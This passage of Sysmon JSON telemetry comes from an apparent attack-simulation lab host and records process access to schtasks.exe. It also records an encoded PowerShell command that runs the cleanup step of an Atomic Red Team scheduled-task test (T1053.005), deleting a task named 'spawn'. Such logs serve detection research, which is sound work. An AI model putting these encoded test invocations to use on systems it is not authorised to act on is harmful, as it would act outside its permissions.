06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.479\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.479","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.516\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nProcessId: 4880\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /TN spawn /F >nul 2>&1\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.516","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /TN spawn /F &gt;nul 2&gt;&amp;1\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6